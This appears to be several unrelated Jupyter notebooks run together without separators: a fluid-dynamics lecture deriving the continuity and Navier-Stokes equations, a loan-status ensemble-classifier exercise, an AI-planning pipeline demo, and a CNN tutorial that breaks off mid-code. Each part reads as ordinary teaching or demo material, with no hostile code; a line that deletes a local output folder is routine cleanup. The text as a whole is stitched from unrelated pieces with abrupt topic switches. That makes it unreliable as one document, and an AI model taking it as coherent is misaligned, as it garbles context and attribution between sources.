## The Navier-Stokes Equations
The Navier-Stokes equations are the fundamental equations for computing viscous flows. Although, strictly speaking, the term refers only to the momentum equation, in computational fluid dynamics it usually denotes the entire set of equations consisting of the continuity, momentum and energy equations.
In this section we briefly revisit the derivation of the equations known from fluid mechanics. However, we choose a different approach and make use of the substantial derivative introduced earlier, i.e. the Lagrangian point of view.
The goal is to end up with a system of equations for the 2D case.
### Continuity Equation
Using the continuity equation (conservation of mass), we first show a derivation from the Eulerian point of view and then from the Lagrangian point of view.
#### Eulerian point of view:
If we consider a control volume fixed in space, the rate of change of mass in the volume element $\text{d}V$ equals the difference between the inflowing and outflowing mass flow rates.
The outflowing mass flow rate differs from the inflowing one exactly by the change of the mass flow rate over the extent of the control volume. The following figure shows the control volume and the entering and leaving mass flows for the 1D case.
<img src="Konti.pdf" style="width: 400px;"/>
Truncating the Taylor series after the first-order term, the mass balance (1D) becomes:
$$\frac{\partial m}{\partial t} = \dot{m} - \left(\dot{m}+\frac{\partial \dot{m}}{\partial x}\text{d}x\right)$$
or, with $m = \rho\, \text{d}x\text{d}y\text{d}z$ and $\dot{m} = \rho v_x \text{d}y\text{d}z$:
$$\frac{\partial \rho}{\partial t} = - \frac{\partial \left(\rho v_x\right)}{\partial x}$$
In the 3D case, the four mass flows in the $y$- and $z$-directions have to be taken into account as well, which yields the continuity equation:
<div class=highlight>
$$\frac{\partial \rho}{\partial t} = - \left[\frac{\partial (\rho v_x)}{\partial x} + \frac{\partial (\rho v_y)}{\partial y} + \frac{\partial (\rho v_z)}{\partial z}\right]$$
</div>
or in alternative notation:
<div class=highlight>
$$\frac{\partial \rho}{\partial t} + \frac{\partial (\rho v_i)}{\partial x_i} = 0 \quad \text{or} \quad \frac{\partial \rho}{\partial t} + \text{div}(\rho \overrightarrow{v}) = 0 \quad \text{or} \quad \frac{\partial \rho}{\partial t} + \nabla\cdot(\rho \overrightarrow{v}) = 0$$
</div>
#### Lagrangian point of view:
A co-moving observer travelling with velocity $\overrightarrow{v}$ through a flow field of varying density registers the following density change with time:
$$\frac{\text{D}\rho}{\text{D} t} = \frac{\partial \rho}{\partial t} + \overrightarrow{v}\cdot\nabla \rho$$
Using the continuity equation in Eulerian form derived above, we can substitute the partial time derivative of the density:
$$\frac{\text{D}\rho}{\text{D} t} = -\underbrace{\nabla\cdot(\rho \overrightarrow{v})}_{\text{apply the}\atop\text{product rule}} + \overrightarrow{v}\cdot\nabla \rho$$
Applying the product rule to the first term after the equals sign gives:
$$\frac{\text{D}\rho}{\text{D} t} = -\left[\color{red}{\overrightarrow{v}\cdot\nabla \rho} + \rho\nabla\cdot\overrightarrow{v} \right] + \color{red}{\overrightarrow{v}\cdot\nabla \rho} = -\rho\nabla\cdot\overrightarrow{v} = -\rho \text{div}\overrightarrow{v}$$
For **incompressible flows** ($\rho = const$) the continuity equation simplifies to:
$$\text{div} \overrightarrow{v} = 0.$$
That is, incompressible flows are *free of sources and sinks*. Since the density cannot change anywhere in the flow field, mass cannot accumulate at any point. Everything that flows into a control volume must flow out again.
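The divergence-free condition can be checked numerically for a simple flow field. The sketch below (not part of the original notes) samples the planar vortex field $\overrightarrow{v} = (-y,\, x)$, whose divergence vanishes identically, and verifies this with finite differences:

```python
import numpy as np

# Sample the planar vortex field v = (-y, x) on a grid; analytically,
# div v = d(-y)/dx + d(x)/dy = 0, i.e. the field is incompressible.
n = 64
x = np.linspace(-1.0, 1.0, n)
y = np.linspace(-1.0, 1.0, n)
X, Y = np.meshgrid(x, y, indexing='ij')
vx, vy = -Y, X

# Approximate the partial derivatives with finite differences
dvx_dx = np.gradient(vx, x, axis=0)
dvy_dy = np.gradient(vy, y, axis=1)
div_v = dvx_dx + dvy_dy

print(np.max(np.abs(div_v)))  # zero up to round-off
```

The same check applied to a compressible field such as $\overrightarrow{v} = (x,\, y)$ would give a nonzero divergence.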
### Momentum Equation
The momentum equation will likewise be derived from both the Eulerian and the Lagrangian points of view. Momentum is a vector and equals the product of mass and velocity vector:
$$\overrightarrow{p} = m \overrightarrow{v} = \rho V \overrightarrow{v}$$
The change of momentum per unit time equals a force:
$$\frac{\text{d} \overrightarrow{p}}{\text{d} t} = \overrightarrow{F}$$
#### Eulerian point of view
We again consider a control volume fixed in space. Since momentum is a vector, we have to set up one equation per spatial direction (later we will combine these three equations into a single vector equation). The derivation is shown here exemplarily for the $x$-direction.
The change of $x$-momentum in the control volume equals the sum of the body forces acting on the control volume (gravity, electric fields, magnetic fields) and the surface forces (inertial forces = entering/leaving momentum flows, friction forces, pressure forces):
$$\frac{\partial (\rho v_x)}{\partial t}\text{d}V = \scriptsize{ {{\text{momentum flows}\atop\text{(inertial forces)}} + \text{pressure forces}} + \text{friction forces} + \text{body forces}}$$
We will now assemble the right-hand side of the equation step by step.
##### Momentum flows (inertial forces)
$x$-momentum can be transported with the volume flow through all six faces of the control volume. Hence $x$-momentum can also be carried in the $y$- and $z$-directions by the flow! The following figure shows this for four of the faces.
<img src="Impuls.pdf" style="width: 500px;"/>
Collecting terms, the momentum flows (inertial forces) are:
$$\text{momentum flows} = -\left[
\frac{\partial (\rho v_x v_x)}{\partial x}
+\frac{\partial (\rho v_x v_y)}{\partial y}
+\frac{\partial (\rho v_x v_z)}{\partial z}
\right]\text{d}x\text{d}y\text{d}z$$
##### Pressure forces
The pressure forces in the $x$-direction act on two faces of the control volume, each perpendicular to the respective face:
<img src="Druck.pdf" style="width: 500px;"/>
Collecting terms, the pressure forces in the $x$-direction are:
$$\text{pressure forces} =
-\frac{\partial p}{\partial x} \text{d}x\text{d}y\text{d}z$$
##### Friction forces
The friction forces (normal and shear forces) in the $x$-direction act on all six faces of the control volume:
<img src="Schub.pdf" style="width: 500px;"/>
In total they yield:
$$\text{friction forces} =
\left[
\frac{\partial \tau_{xx}}{\partial x} +
\frac{\partial \tau_{yx}}{\partial y} +
\frac{\partial \tau_{zx}}{\partial z}
\right]\text{d}x\text{d}y\text{d}z$$
##### Body forces
The body forces act uniformly on the entire control volume. Among the most important is gravity, which we can account for in the equations as follows:
$$\scriptsize{\text{body forces}} = \rho\cdot g_x\text{d}x\text{d}y\text{d}z$$
##### Putting it all together:
Adding all contributions and dividing by the control volume $\text{d}V = \text{d}x\text{d}y\text{d}z$ yields the momentum equation for the $x$-direction and, analogously, for the $y$- and $z$-directions:
$$\small{\frac{\partial (\rho v_x)}{\partial t}
+ \frac{\partial (\rho v_x v_x)}{\partial x}
+ \frac{\partial (\rho v_x v_y)}{\partial y}
+ \frac{\partial (\rho v_x v_z)}{\partial z}
=
- \frac{\partial p}{\partial x} + \rho g_x
+ \frac{\partial \tau_{xx}}{\partial x}
+ \frac{\partial \tau_{yx}}{\partial y}
+ \frac{\partial \tau_{zx}}{\partial z}}
$$
$$\small{\frac{\partial (\rho v_y)}{\partial t}
+ \frac{\partial (\rho v_y v_x)}{\partial x}
+ \frac{\partial (\rho v_y v_y)}{\partial y}
+ \frac{\partial (\rho v_y v_z)}{\partial z}
=
- \frac{\partial p}{\partial y} + \rho g_y
+ \frac{\partial \tau_{xy}}{\partial x}
+ \frac{\partial \tau_{yy}}{\partial y}
+ \frac{\partial \tau_{zy}}{\partial z}}
$$
$$\small{\frac{\partial (\rho v_z)}{\partial t}
+ \frac{\partial (\rho v_z v_x)}{\partial x}
+ \frac{\partial (\rho v_z v_y)}{\partial y}
+ \frac{\partial (\rho v_z v_z)}{\partial z}
=
- \frac{\partial p}{\partial z} + \rho g_z
+ \frac{\partial \tau_{xz}}{\partial x}
+ \frac{\partial \tau_{yz}}{\partial y}
+ \frac{\partial \tau_{zz}}{\partial z}}
$$
The Navier-Stokes equations appear in various forms. One more shall be shown here. To this end, we consider only the left-hand side of the $x$-momentum equation and apply the product rule to the derivatives:
$$\small{\frac{\partial (\rho v_x)}{\partial t}
+ \frac{\partial (\rho v_x v_x)}{\partial x}
+ \frac{\partial (\rho v_x v_y)}{\partial y}
+ \frac{\partial (\rho v_x v_z)}{\partial z}
=
\color{red}{v_x\frac{\partial\rho}{\partial t}} + \rho\frac{\partial v_x}{\partial t} + \color{red}{v_x\frac{\partial(\rho v_x)}{\partial x}} + \rho v_x\frac{\partial v_x}{\partial x} + \color{red}{v_x\frac{\partial(\rho v_y)}{\partial y}} + \rho v_y\frac{\partial v_x}{\partial y} + \color{red}{v_x\frac{\partial(\rho v_z)}{\partial z}} + \rho v_z\frac{\partial v_x}{\partial z}}$$
Looking only at the terms marked in red, it becomes clear that their sum is exactly the continuity equation multiplied by $v_x$, and therefore zero.
We thus obtain a further, equivalent form of the Navier-Stokes equations:
<div class=highlight>
$$\small{\rho\frac{\partial v_x}{\partial t} + \rho v_x\frac{\partial v_x}{\partial x} + \rho v_y\frac{\partial v_x}{\partial y} + \rho v_z\frac{\partial v_x}{\partial z}
=
- \frac{\partial p}{\partial x} + \rho g_x
+ \frac{\partial \tau_{xx}}{\partial x}
+ \frac{\partial \tau_{yx}}{\partial y}
+ \frac{\partial \tau_{zx}}{\partial z}
}$$
<BR>
$$\small{\rho\frac{\partial v_y}{\partial t} + \rho v_x\frac{\partial v_y}{\partial x} + \rho v_y\frac{\partial v_y}{\partial y} + \rho v_z\frac{\partial v_y}{\partial z}
=
- \frac{\partial p}{\partial y} + \rho g_y
+ \frac{\partial \tau_{xy}}{\partial x}
+ \frac{\partial \tau_{yy}}{\partial y}
+ \frac{\partial \tau_{zy}}{\partial z}
}$$
<BR>
$$\small{\underbrace{\vphantom{\rho v_x\frac{\partial v_z}{\partial x} + \rho v_y\frac{\partial v_z}{\partial y} + \rho v_z\frac{\partial v_z}{\partial z}}\rho\frac{\partial v_z}{\partial t}}_{\text{local}\atop\text{change}} + \underbrace{\rho v_x\frac{\partial v_z}{\partial x} + \rho v_y\frac{\partial v_z}{\partial y} + \rho v_z\frac{\partial v_z}{\partial z}}_{\text{convective momentum transport}\atop\text{by the flow}}
=
\underbrace{\vphantom{+ \frac{\partial \tau_{xz}}{\partial x}
+ \frac{\partial \tau_{yz}}{\partial y}
+ \frac{\partial \tau_{zz}}{\partial z}}- \frac{\partial p}{\partial z} + \rho g_z}_{\text{source}\atop\text{terms}}
\underbrace{+ \frac{\partial \tau_{xz}}{\partial x}
+ \frac{\partial \tau_{yz}}{\partial y}
+ \frac{\partial \tau_{zz}}{\partial z}}_{\text{diffusive transport due to}\atop\text{spatial momentum differences}}}$$
</div>
Two transport mechanisms can be assigned to the individual terms of the momentum equation: convective transport, which is caused by the flow motion itself, and diffusive transport, which results from a spatial gradient of the transported quantity (here: momentum); compare the spreading of an ink drop in a glass of quiescent liquid.
##### Modelling the normal and shear stresses $\tau_{ij}$
In the form above, the momentum equation holds for arbitrary fluids. Besides the unknowns we are interested in, $v_x, v_y, v_z$ and $\rho$, the system of the three momentum equations plus the continuity equation also contains the pressure $p$ and the nine normal and shear stresses. As it stands, it is therefore not yet solvable (only 4 equations for 14 unknowns).
If the temperature is known, the pressure can be computed e.g. from the ideal gas law $p/\rho = R T$. For the nine stresses we still need a constitutive relation that depends on the type of fluid. For [Newtonian fluids](https://de.wikipedia.org/wiki/Newtonsches_Fluid), the *Newtonian shear-stress ansatz* can be used:
<div class=highlight>
$$\tau_{ij} = \mu \left(\frac{\partial v_i}{\partial x_j} + \frac{\partial v_j}{\partial x_i} \right) + \delta_{ij}\lambda\nabla\cdot \overrightarrow{v}$$
</div>
It states that the stresses are proportional to the velocity gradients (the deformation tensor), the proportionality factor being the [dynamic viscosity](https://de.wikipedia.org/wiki/Viskosität) $\mu$. The last term in the equation accounts for the so-called [bulk viscosity](https://de.wikipedia.org/wiki/Volumenviskosität) $\lambda$. It is negligible in the incompressible case and for monatomic gases. It does matter, however, for dilute polyatomic gases (e.g. when computing atmospheric re-entry vehicles). According to the Stokes hypothesis (which is, however, not exact): $\lambda+\frac{2}{3}\mu = 0$.
> Note: The symbol $\delta_{ij}$ is the [Kronecker delta](https://de.wikipedia.org/wiki/Kronecker-Delta) known from mathematics. It takes the value 1 for $i=j$ and 0 for $i\ne j$. It is used whenever, in index notation, only the entries on the matrix diagonal are to be addressed. In the equation above, the bulk viscosity therefore only plays a role for the three normal stresses $\tau_{11}, \tau_{22}$ and $\tau_{33}$.
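As a quick numerical plausibility check (a sketch with made-up values, not part of the original notes), the stress model can be evaluated for a sample velocity-gradient tensor; with the Stokes hypothesis $\lambda = -\frac{2}{3}\mu$, the trace of $\tau_{ij}$, i.e. the viscous contribution to the mean normal stress, vanishes:

```python
import numpy as np

# Newtonian stress model: tau_ij = mu*(dv_i/dx_j + dv_j/dx_i) + delta_ij*lambda*div(v)
mu = 1.0e-3            # dynamic viscosity (made-up value)
lam = -2.0 / 3.0 * mu  # Stokes hypothesis: lambda + 2/3 mu = 0

# Sample velocity-gradient tensor, grad_v[i, j] = dv_i/dx_j (made-up values)
grad_v = np.array([[0.1, 0.3, 0.0],
                   [0.2, -0.4, 0.1],
                   [0.0, 0.5, 0.5]])

div_v = np.trace(grad_v)  # dv_x/dx + dv_y/dy + dv_z/dz
tau = mu * (grad_v + grad_v.T) + lam * div_v * np.eye(3)

print(tau)            # the stress tensor is symmetric
print(np.trace(tau))  # ~0 under the Stokes hypothesis
```

Note that the Kronecker delta appears here as the identity matrix `np.eye(3)`, so the $\lambda$ term only affects the diagonal (normal) stresses, as stated above.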
**Exercise:** Write out all nine components of the stress tensor.
#### Lagrangian point of view
The derivation of the Navier-Stokes equations from the Lagrangian point of view resembles that of a molecular dynamics simulation, except that we no longer consider individual particles but a volume element that moves along with the flow. Newton's second law states:
*mass times acceleration equals force*
or, referred to the control volume $V_{KV}$:
$$\frac{m\cdot a}{V_{KV}} = \frac{F}{V_{KV}}$$
or
$$\rho \frac{\text{D}\overrightarrow{v}}{\text{D}t} = \text{pressure forces} + \text{friction forces} + \text{body forces}$$
In contrast to the derivation from the Eulerian point of view, the momentum flows are absent, since the control volume moves with the flow and nothing flows through it. In this form, the Navier-Stokes equations can be written very compactly:
$$\rho \frac{\text{D}\overrightarrow{v}}{\text{D}t} = \nabla \cdot \tau_{ij}^* + \rho\cdot\overrightarrow{g}$$
with
$$\tau_{ij}^* = -p\cdot\delta_{ij} + \tau_{ij}$$
To recover the form from the Eulerian point of view, we only have to write out the substantial derivative. The convective terms then reappear:
$$\rho\cdot\left(\frac{\partial \overrightarrow{v}}{\partial t}+\overrightarrow{v}\cdot\nabla\overrightarrow{v} \right) = \nabla \cdot \tau_{ij}^* + \rho\cdot\overrightarrow{g}$$
**(Longer) exercise:** Write out the vector equation and show that it agrees with the system of equations from the Eulerian point of view. Hint: Apply the product rule to the derivatives $\frac{\partial (\rho v_i)}{\partial x_j}$ again.
This gives us the system of equations needed to compute isothermal flows. For non-isothermal flows we additionally need the energy equation, which is derived elsewhere.
In the [next notebook](TFD - 3.3 Kontinuumsstroemungen - Navier-Stokes-Gleichungen-2D.ipynb) we will simplify the Navier-Stokes equations for two-dimensional, incompressible flows of Newtonian fluids and, later in the course, solve them using the finite-difference method.
---
###### Copyright (c) 2017, Matthias Stripf
The following Python code may be ignored. It only loads the correct style sheet for the Jupyter notebooks.
```
from IPython.core.display import HTML
def css_styling():
    styles = open('TFDStyle.css', 'r').read()
    return HTML(styles)

css_styling()
```
# Ensemble Learning
## Initial Imports
```
import warnings
warnings.filterwarnings('ignore')
import numpy as np
import pandas as pd
from pathlib import Path
from collections import Counter
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import balanced_accuracy_score
from sklearn.metrics import confusion_matrix, accuracy_score, classification_report
from imblearn.metrics import classification_report_imbalanced
from sklearn.ensemble import RandomForestClassifier
from imblearn.ensemble import BalancedRandomForestClassifier
from imblearn.ensemble import EasyEnsembleClassifier
```
## Read the CSV and Perform Basic Data Cleaning
```
# Load the data
file_path = Path('Resources/LoanStats_2019Q1.csv')
df = pd.read_csv(file_path)
# Preview the data
df.head()
```
## Split the Data into Training and Testing
```
# Create our target
y = df.loan_status
# Create our features
X = df.drop(columns='loan_status', axis=1)
# Inspect the categorical columns and one-hot encode them
df.select_dtypes(include='object').info()
X = pd.get_dummies(X, columns=['home_ownership', 'verification_status', 'issue_d', 'pymnt_plan', 'initial_list_status', 'next_pymnt_d', 'application_type', 'hardship_flag', 'debt_settlement_flag'])
X.head()
# Check the balance of our target values
y.value_counts()
# Split the X and y into X_train, X_test, y_train, y_test
X_train, X_test, y_train, y_test = train_test_split(
    X, y, random_state=1, stratify=y
)
```
## Data Pre-Processing
Scale the training and testing data using the `StandardScaler` from `sklearn`. Remember that when scaling the data, you only scale the features data (`X_train` and `X_test`).
```
# Create the StandardScaler instance
scaler = StandardScaler()
# Fit the Standard Scaler with the training data
# When fitting scaling functions, only train on the training dataset
X_scaler = scaler.fit(X_train)
# Scale the training and testing data
X_train_scaled = X_scaler.transform(X_train)
X_test_scaled = X_scaler.transform(X_test)
```
## Ensemble Learners
In this section, you will compare two ensemble algorithms to determine which algorithm results in the best performance. You will train a Balanced Random Forest Classifier and an Easy Ensemble Classifier. For each algorithm, be sure to complete the following steps:
1. Train the model using the training data.
2. Calculate the balanced accuracy score from sklearn.metrics.
3. Display the confusion matrix from sklearn.metrics.
4. Generate a classification report using `classification_report_imbalanced` from imbalanced-learn.
5. For the Balanced Random Forest Classifier only, print the feature importances sorted in descending order (most important feature to least important) along with the feature score.
Note: Use a random state of 1 for each algorithm to ensure consistency between tests.
### Balanced Random Forest Classifier
```
# Resample the training data with the BalancedRandomForestClassifier
rf_model = BalancedRandomForestClassifier(n_estimators=100, random_state=1)
rf_model = rf_model.fit(X_train_scaled, y_train)
rf_predictions = rf_model.predict(X_test_scaled)
# Calculate the balanced accuracy score
acc_score = balanced_accuracy_score(y_test, rf_predictions)
cm_rf = confusion_matrix(y_test, rf_predictions)
cm_rf_df = pd.DataFrame(
    cm_rf, index=['Actual 0', 'Actual 1'], columns=['predicted 0', 'predicted 1']
)
# Display the confusion matrix
print('Confusion Matrix')
display(cm_rf_df)
print(f'Balanced Accuracy Score : {acc_score}')
print('Classification Report')
print(classification_report(y_test, rf_predictions))
# Print the imbalanced classification report
print(classification_report_imbalanced(y_test, rf_predictions))
# List the features sorted in descending order by feature importance
importances = rf_model.feature_importances_
sorted(zip(rf_model.feature_importances_, X.columns), reverse=True)
# Personal challenge: put the ~10 highest-importance features in a DataFrame to visualize them
importances_df = pd.DataFrame(
    (rf_model.feature_importances_, X.columns)
)
importances_df = importances_df.T
importances_df.columns = ['Importance', 'Feature']
importances_df = importances_df.sort_values(["Importance"], ascending=False).reset_index(drop=True)
importances_df.head()
importances_df.drop(index=importances_df.iloc[10:, :].index.tolist(), inplace=True)
importances_df
importances_df.set_index(('Feature'), inplace=True)
importances_df.plot(kind='barh', color='lightgreen', title= 'Features Importances', legend=False)
```
### Easy Ensemble Classifier
```
# Train the Classifier
eec_model = EasyEnsembleClassifier(n_estimators=100, random_state=1)
eec_model = eec_model.fit(X_train_scaled, y_train)
eec_y_predictions = eec_model.predict(X_test_scaled)
# Calculate the balanced accuracy score
balanced_accuracy_score(y_test, eec_y_predictions)
# Display the confusion matrix
confusion_matrix(y_test, eec_y_predictions)
# Print the imbalanced classification report
print(classification_report_imbalanced(y_test, eec_y_predictions, digits=4))
```
### Final Questions
1. Which model had the best balanced accuracy score?
Random Forest
2. Which model had the best recall score?
Random Forest, with a recall score of 1.0
3. Which model had the best geometric mean score?
Easy Ensemble Classifier, with a geometric mean of 0.9253
4. What are the top three features?
total_recovered_principle, total_payment, total_payment_inv
# Using AI planning to explore data science pipelines
```
from __future__ import print_function
import sys
import os
import types
sys.path.append(os.path.abspath(os.path.join(os.getcwd(), "../grammar2lale")))
# Clean output directory where we store planning and result files
os.system('rm -rf ../output')
os.system('mkdir -p ../output')
```
## 1. Start with a Data Science grammar, in EBNF format
```
# This is the grammar file we will use
GRAMMAR_FILE="../grammar/dsgrammar-subset-sklearn.bnf"
# Copy grammar to the output directory
os.system("cp " + GRAMMAR_FILE + " ../output/")
!cat ../output/dsgrammar-subset-sklearn.bnf
```
## 2. Convert the grammar into an HTN domain and problem and use [HTN to PDDL](https://github.com/ronwalf/HTN-Translation) to translate to a PDDL task
```
from grammar2lale import Grammar2Lale
# Generate HTN specifications
G2L = Grammar2Lale(grammar_file=GRAMMAR_FILE)
with open("../output/domain.htn", "w") as f:
    f.write(G2L.htn_domain)
with open("../output/problem.htn", "w") as f:
    f.write(G2L.htn_problem)
from grammarDiagram import sklearn_diagram
with open('../output/grammar.svg', 'w') as f:
    sklearn_diagram.writeSvg(f.write)
from IPython.core.display import SVG
SVG('../output/grammar.svg')
!cat ../output/domain.htn
!cat ../output/problem.htn
```
## 3. Extend the PDDL task by integrating soft constraints
```
import re
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
# as a safety step, setting costs to 0 for any parts of the grammar that are non-identifiers (e.g., parens, etc.)
for token in G2L.htn.mapping:
    if not re.match('^[_a-zA-Z]', str(token)):
        G2L.costs[token] = 0
# prepare the list of possible constraints
constraint_options = G2L.get_selectable_constraints()
constraint_options.sort()
# prepare a constraint selection form
interact_pipeline_params=interact.options(manual=True, manual_name='Generate PDDL')
pipelines = []
NUM_PIPELINES = 10
CONSTRAINTS = []
# This is the function that handles the constraint selection
@interact_pipeline_params(
    num_pipelines=widgets.IntSlider(value=10, min=1, max=100),
    constraints=widgets.SelectMultiple(
        options=constraint_options,
        description='Search constraints',
        rows=min(20, len(constraint_options))))
def select_pipeline_gen_params(num_pipelines, constraints):
    global pipelines
    global NUM_PIPELINES
    global CONSTRAINTS
    NUM_PIPELINES = num_pipelines
    CONSTRAINTS = list(constraints)
G2L.create_pddl_task(NUM_PIPELINES, CONSTRAINTS)
with open("../output/domain.pddl", "w") as f:
    f.write(G2L.last_task['domain'])
with open("../output/problem.pddl", "w") as f:
    f.write(G2L.last_task['problem'])
!cat ../output/domain.pddl
!cat ../output/problem.pddl
```
## 4. Use a planner to solve the planning task (in this case, [K*](https://github.com/ctpelok77/kstar) )
```
import json
G2L.run_pddl_planner()
with open("../output/first_planner_call.json", "w") as f:
    f.write(json.dumps(G2L.last_planner_object, indent=3))
!cat ../output/first_planner_call.json
```
## 5. Translate plans to [LALE](https://github.com/IBM/lale) Data Science pipelines
```
# Translate to pipelines
pipelines = G2L.translate_to_pipelines(NUM_PIPELINES)
from pipeline_optimizer import PipelineOptimizer
from sklearn.datasets import load_iris
from lale.helpers import to_graphviz
from lale.lib.sklearn import *
from lale.lib.lale import ConcatFeatures as Concat
from lale.lib.lale import NoOp
from lale.lib.sklearn import KNeighborsClassifier as KNN
from lale.lib.sklearn import OneHotEncoder as OneHotEnc
from lale.lib.sklearn import Nystroem
from lale.lib.sklearn import PCA
optimizer = PipelineOptimizer(load_iris(return_X_y=True))
# instantiate LALE objects from pipeline definitions
LALE_pipelines = [optimizer.to_lale_pipeline(p) for p in pipelines]
# Display selected pipeline
def show_pipeline(pipeline):
    print("Displaying pipeline " + pipeline['id'] + ", with cost " + str(pipeline['score']))
    print(pipeline['pipeline'])
    print('==================================================================================')
    print()
    print()
    print()
    display(to_graphviz(pipeline['lale_pipeline']))
display_pipelines = [[p['pipeline'], p] for p in LALE_pipelines]
interact(show_pipeline, pipeline=display_pipelines)
!pip install 'liac-arff>=2.4.0'
```
## 6. Optimize one of the pipelines on a small dataset
```
from lale.lib.lale import Hyperopt
import lale.datasets.openml
from sklearn.datasets import load_iris
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
PIPELINE_IDX = 0
display(to_graphviz(LALE_pipelines[PIPELINE_IDX]['lale_pipeline']))
opt = Hyperopt(
    estimator=LALE_pipelines[PIPELINE_IDX]['lale_pipeline'],
    max_evals=20,
    scoring='accuracy'
)
X, y = load_iris(return_X_y=True)
train_X, test_X, train_y, test_y = train_test_split(
    X, y, test_size=0.2, stratify=y, random_state=5489
)
X
trained_pipeline = opt.fit(train_X, train_y)
predictions = trained_pipeline.predict(test_X)
best_accuracy = accuracy_score(test_y, [round(pred) for pred in predictions])
print('Best accuracy: ' + str(best_accuracy))
```
## 7. Train hyperparameters and evaluate the resulting LALE pipelines
```
trained_pipelines, dropped_pipelines = optimizer.evaluate_and_train_pipelines(pipelines)
from IPython.display import HTML
from tabulate import tabulate
from lale.pretty_print import to_string
def show_pipeline_accuracy(tp):
    pipeline_table = [[to_string(p['trained_pipeline']).replace('\n', '<br/>'), str(p['best_accuracy'])] for p in tp]
    display(HTML(tabulate(pipeline_table, headers=['Pipeline', 'Accuracy'], tablefmt='html')))
show_pipeline_accuracy(trained_pipelines)
```
## 8. Use pipeline accuracy to compute new PDDL action costs
```
feedback = optimizer.get_feedback(trained_pipelines)
G2L.feedback(feedback)
costs_table = [[str(k), G2L.costs[k]] for k in G2L.costs.keys()]
display(HTML(tabulate(costs_table, headers=['Pipeline element', 'Computed cost'], tablefmt='html')))
```
## 9. Invoke planner again on updated PDDL task and translate to pipelines
```
new_pipelines = G2L.get_plans(num_pipelines=NUM_PIPELINES, constraints=CONSTRAINTS)
with open('../output/domain_after_feedback.pddl', 'w') as f:
    f.write(G2L.last_task['domain'])
with open('../output/problem_after_feedback.pddl', 'w') as f:
    f.write(G2L.last_task['problem'])
with open('../output/second_planner_call.json', 'w') as f:
    f.write(json.dumps(G2L.last_planner_object, indent=3))
def build_and_show_new_table():
    new_pipeline_table = [[pipelines[idx]['pipeline'], new_pipelines[idx]['pipeline']] for idx in range(min(len(pipelines), len(new_pipelines)))]
    display(HTML(tabulate(new_pipeline_table, headers=['First iteration', 'After feedback'], tablefmt='html')))
build_and_show_new_table()
!cat ../output/domain_after_feedback.pddl
!cat ../output/problem_after_feedback.pddl
```
This Jupyter notebook explains the architecture and the mechanism of the Convolutional Neural Network (ConvNet) step by step from a theoretical standpoint. Then, we implement the CNN code for a multi-class classification task using PyTorch. <br>
The notebook was implemented by <i>Nada Chaari</i>, PhD student at Istanbul Technical University (ITU). <br>
# Table of Contents:
1)Convolution layer
1-1) Input image
1-2) Filter
1-3) Output image
1-4) Multiple filters
1-5) One-layer of a convolutional neural network
2)Pooling layer
3)Fully connected layer
4)Softmax
5)Application of CNN using CIFAR dataset
5-1) Dataset
5-2) Load and normalize the CIFAR10 training and test datasets
5-3) Define a Convolutional Neural Network
5-4) Define a Loss function and optimizer
5-5) Train the CNN
5-6) Test the network on the test data
Sources used to build this Jupyter notebook:
* https://towardsdatascience.com/understanding-images-with-skimage-python-b94d210afd23
* https://gombru.github.io/2018/05/23/cross_entropy_loss/
* https://medium.com/@toprak.mhmt/activation-functions-for-deep-learning-13d8b9b20e
* https://github.com/python-engineer/pytorchTutorial/blob/master/14_cnn.py
* https://medium.com/machine-learning-bites/deeplearning-series-convolutional-neural-networks-a9c2f2ee1524
* https://towardsdatascience.com/stochastic-gradient-descent-clearly-explained-53d239905d31
# CNN (ConvNet) definition
A Convolutional Neural Network is a sequence of layers made up of neurons with learnable weights and biases. Each neuron receives some inputs, performs a dot product and optionally follows it with a non-linearity. The whole network still expresses a single differentiable score function: from the raw image pixels on one end to class scores at the other. CNNs have a loss function (e.g. SVM/Softmax) on the last (fully-connected) layer.
* There are 3 types of layers to build the ConvNet architectures:
* Convolution (CONV)
* Pooling (POOL)
* Fully connected (FC)
# 1) Convolution layer
## 1-1) Input image
* A color image has three channels: red, green and blue, which can be represented as three 2D matrices stacked on top of each other (one per color), each holding pixel values in the range 0 to 255.
<img src='https://miro.medium.com/max/1400/1*icINeO4H7UKe3NlU1fXqlA.jpeg' width='400' align="center">
## 1-2) Filter
<img src='https://miro.medium.com/max/933/1*7S266Kq-UCExS25iX_I_AQ.png' width='500' align="center">
* In the filter, the value '1' picks out bright regions,
* while '-1' highlights dark regions,
* and '0' corresponds to grey.
* The convolution layer of a ConvNet extracts features from the input image:
* choose a filter (kernel) of a certain dimension
* slide the filter from the top left to the right until we reach the bottom of the image.
* The convolution operation is an element-wise multiplication between the two matrices (the filter and the corresponding part of the image), followed by a sum of the products.
* The resulting value forms a single element of the output matrix.
* Stride: the step by which the filter moves horizontally and vertically, in pixels.
In the example above, the stride equals 1.
Because the pixels on the edges are "touched" by the filter less often than the pixels inside the image, we apply padding.
* Padding: pad the image with zeros all around its border so the filter can slide over the edges and the output size stays equal to the input size.
<img src='https://miro.medium.com/max/684/1*PBnmjdDqn-OF8JEyRgKm9Q.png' width='200' align="center">
<font color='red'> Important </font>: The goal of a convolutional neural network is to learn the values of filters. They are treated as parameters, which the network learns using backpropagation.
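The sliding-window computation described above can be sketched in plain NumPy (an illustration only; real frameworks use optimized implementations):

```python
import numpy as np

# Plain-NumPy sketch of the convolution (cross-correlation) described above:
# slide the filter over the image, multiply element-wise, and sum the products.
def conv2d(image, kernel, stride=1):
    f = kernel.shape[0]
    n = image.shape[0]
    out = (n - f) // stride + 1
    result = np.zeros((out, out))
    for i in range(out):
        for j in range(out):
            patch = image[i*stride:i*stride+f, j*stride:j*stride+f]
            result[i, j] = np.sum(patch * kernel)
    return result

image = np.arange(16, dtype=float).reshape(4, 4)
kernel = np.array([[1.0, 0.0],
                   [0.0, -1.0]])  # simple 2x2 difference filter (made-up example)
print(conv2d(image, kernel))
```

With a 4x4 input, a 2x2 filter and stride 1, the output is 3x3, matching the size formula of the next subsection.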
## 1-3) Output image
The size of the output image after applying the filter, knowing the filter size (f), stride (s), pad (p), and input size (n) is given as:
<img src='https://miro.medium.com/max/933/1*rOyHQ2teFXX5rIIFHwYDsg.png' width='400' align="center">
<img src='https://miro.medium.com/max/933/1*IBWQJSnW19WIYsObZcMTNg.png' width='500' align="center">
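The formula above is easy to turn into a small helper (a sketch, not from the original notebook):

```python
# Output size of a convolution on a square n x n input with filter size f,
# stride s and padding p: floor((n + 2p - f) / s) + 1
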